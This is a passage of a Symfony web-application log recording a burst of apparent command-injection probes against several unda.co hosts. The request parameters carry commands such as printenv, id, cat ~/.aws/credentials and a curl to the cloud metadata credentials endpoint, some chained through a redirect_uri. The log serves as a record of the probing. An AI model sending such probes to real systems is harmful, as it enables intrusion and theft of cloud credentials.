  1842. [2025-12-17 04:44:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1843. [2025-12-17 04:44:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1844. [2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1845. [2025-12-17 04:44:28] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1846. [2025-12-17 04:44:28] security.DEBUG: Calling Authentication entry point. [] []
  1847. [2025-12-17 04:44:28] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
  1848. [2025-12-17 04:44:28] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=printenv","method":"GET"} []
  1849. [2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
  1850. [2025-12-17 04:44:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1851. [2025-12-17 04:44:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1852. [2025-12-17 04:44:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1853. [2025-12-17 04:44:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1854. [2025-12-17 04:44:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1855. [2025-12-17 04:44:28] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1856. [2025-12-17 04:44:28] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?cmd=echo%20OMEGA_RCE_OK","method":"GET"} []
  1857. [2025-12-17 04:44:28] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
  1858. [2025-12-17 04:44:28] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
  1859. [2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1860. [2025-12-17 04:44:28] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1861. [2025-12-17 04:44:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1862. [2025-12-17 04:44:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1863. [2025-12-17 04:44:29] security.DEBUG: Calling Authentication entry point. [] []
  1864. [2025-12-17 04:44:29] security.DEBUG: Calling Authentication entry point. [] []
  1865. [2025-12-17 04:44:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
  1866. [2025-12-17 04:44:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Dprintenv","method":"GET"} []
  1867. [2025-12-17 04:44:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
  1868. [2025-12-17 04:44:29] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
  1869. [2025-12-17 04:44:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1870. [2025-12-17 04:44:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1871. [2025-12-17 04:44:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1872. [2025-12-17 04:44:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?exec=echo%20OMEGA_RCE_OK","method":"GET"} []
  1873. [2025-12-17 04:44:29] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
  1874. [2025-12-17 04:44:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1875. [2025-12-17 04:44:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1876. [2025-12-17 04:44:29] security.DEBUG: Calling Authentication entry point. [] []
  1877. [2025-12-17 04:44:29] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
  1878. [2025-12-17 04:44:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
  1879. [2025-12-17 04:44:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1880. [2025-12-17 04:44:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1881. [2025-12-17 04:44:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1882. [2025-12-17 04:44:29] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=id","method":"GET"} []
  1883. [2025-12-17 04:44:29] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
  1884. [2025-12-17 04:44:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?shell=echo%20OMEGA_RCE_OK","method":"GET"} []
  1885. [2025-12-17 04:44:29] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
  1886. [2025-12-17 04:44:29] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1887. [2025-12-17 04:44:29] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1888. [2025-12-17 04:44:29] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1889. [2025-12-17 04:44:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1890. [2025-12-17 04:44:29] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1891. [2025-12-17 04:44:29] security.DEBUG: Calling Authentication entry point. [] []
  1892. [2025-12-17 04:44:29] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1893. [2025-12-17 04:44:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1894. [2025-12-17 04:44:30] security.DEBUG: Calling Authentication entry point. [] []
  1895. [2025-12-17 04:44:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
  1896. [2025-12-17 04:44:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?0=echo%20OMEGA_RCE_OK","method":"GET"} []
  1897. [2025-12-17 04:44:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
  1898. [2025-12-17 04:44:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1899. [2025-12-17 04:44:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1900. [2025-12-17 04:44:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1901. [2025-12-17 04:44:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Did","method":"GET"} []
  1902. [2025-12-17 04:44:30] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
  1903. [2025-12-17 04:44:30] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
  1904. [2025-12-17 04:44:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1905. [2025-12-17 04:44:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1906. [2025-12-17 04:44:30] security.DEBUG: Calling Authentication entry point. [] []
  1907. [2025-12-17 04:44:30] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
  1908. [2025-12-17 04:44:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?c=echo%20OMEGA_RCE_OK","method":"GET"} []
  1909. [2025-12-17 04:44:30] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
  1910. [2025-12-17 04:44:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1911. [2025-12-17 04:44:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1912. [2025-12-17 04:44:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1913. [2025-12-17 04:44:30] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
  1914. [2025-12-17 04:44:30] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=cat%20~%2F.aws%2Fcredentials","method":"GET"} []
  1915. [2025-12-17 04:44:30] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1916. [2025-12-17 04:44:30] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1917. [2025-12-17 04:44:30] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1918. [2025-12-17 04:44:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1919. [2025-12-17 04:44:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1920. [2025-12-17 04:44:30] security.DEBUG: Calling Authentication entry point. [] []
  1921. [2025-12-17 04:44:30] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
  1922. [2025-12-17 04:44:30] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1923. [2025-12-17 04:44:30] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1924. [2025-12-17 04:44:30] security.DEBUG: Calling Authentication entry point. [] []
  1925. [2025-12-17 04:44:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
  1926. [2025-12-17 04:44:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?run=echo%20OMEGA_RCE_OK","method":"GET"} []
  1927. [2025-12-17 04:44:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
  1928. [2025-12-17 04:44:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
  1929. [2025-12-17 04:44:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1930. [2025-12-17 04:44:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1931. [2025-12-17 04:44:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1932. [2025-12-17 04:44:31] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
  1933. [2025-12-17 04:44:31] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1934. [2025-12-17 04:44:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Dcat%2520~%2F.aws%2Fcredentials","method":"GET"} []
  1935. [2025-12-17 04:44:31] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1936. [2025-12-17 04:44:31] security.DEBUG: Calling Authentication entry point. [] []
  1937. [2025-12-17 04:44:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
  1938. [2025-12-17 04:44:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?do=echo%20OMEGA_RCE_OK","method":"GET"} []
  1939. [2025-12-17 04:44:31] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://api.unda.co/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
  1940. [2025-12-17 04:44:31] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
  1941. [2025-12-17 04:44:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  1942. [2025-12-17 04:44:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1943. [2025-12-17 04:44:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  1944. [2025-12-17 04:44:31] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
  1945. [2025-12-17 04:44:31] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1946. [2025-12-17 04:44:31] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1947. [2025-12-17 04:44:31] security.DEBUG: Calling Authentication entry point. [] []
  1948. [2025-12-17 04:44:31] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/?cmd=curl%20-s%20http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F","method":"GET"} []
  1949. [2025-12-17 04:44:31] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  1950. [2025-12-17 04:44:31] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1951. [2025-12-17 04:44:31] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  1952. [2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1953. [2025-12-17 04:44:32] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/?command=echo%20OMEGA_RCE_OK","method":"GET"} []
  1954. [2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1955. [2025-12-17 04:44:32] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  1956. [2025-12-17 04:44:32] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  1957. [2025-12-17 04:44:32] security.DEBUG: Calling Authentication entry point. [] []
  1958. [2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1959. [2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1960. [2025-12-17 04:44:32] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F%3Fcmd%3Dcurl%2520-s%2520http%253A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F","method":"GET"} []
  1961. [2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1962. [2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1963. [2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  1964. [2025-12-17 04:44:32] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api/cache"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api/cache\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
